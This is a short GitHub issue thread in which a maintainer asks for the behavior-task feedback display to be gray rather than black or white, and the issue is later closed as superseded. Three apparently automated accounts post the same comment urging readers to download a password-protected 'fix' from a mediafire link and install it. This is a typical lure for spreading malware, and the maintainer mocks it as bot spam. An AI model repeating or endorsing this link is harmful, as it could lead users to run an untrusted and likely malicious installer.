### ISSUE TITLE
online feedback could be gray instead of black or white, so it would be always visible

### ISSUE THREAD

**Issue by rozmar** [AllenNeuralDynamics/Aind.Behavior.ForceForaging#24]
is it a quick fix? :)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rozmar** [comment]
@jia6214876  I am sure you are not a bot with 500 ms latency to give me this Not at all suspicious comment!
Wow you are subtle!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rozmar** [comment]
Man here is another one lol :D

Back to the request, maybe you  could also change the LUT of the image to go from gray to white, so the black is only the cursor, maybe this is the quickest fix

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bruno-f-cruz** [comment]
Superseded by work in https://github.com/AllenNeuralDynamics/Aind.Behavior.Telekinesis
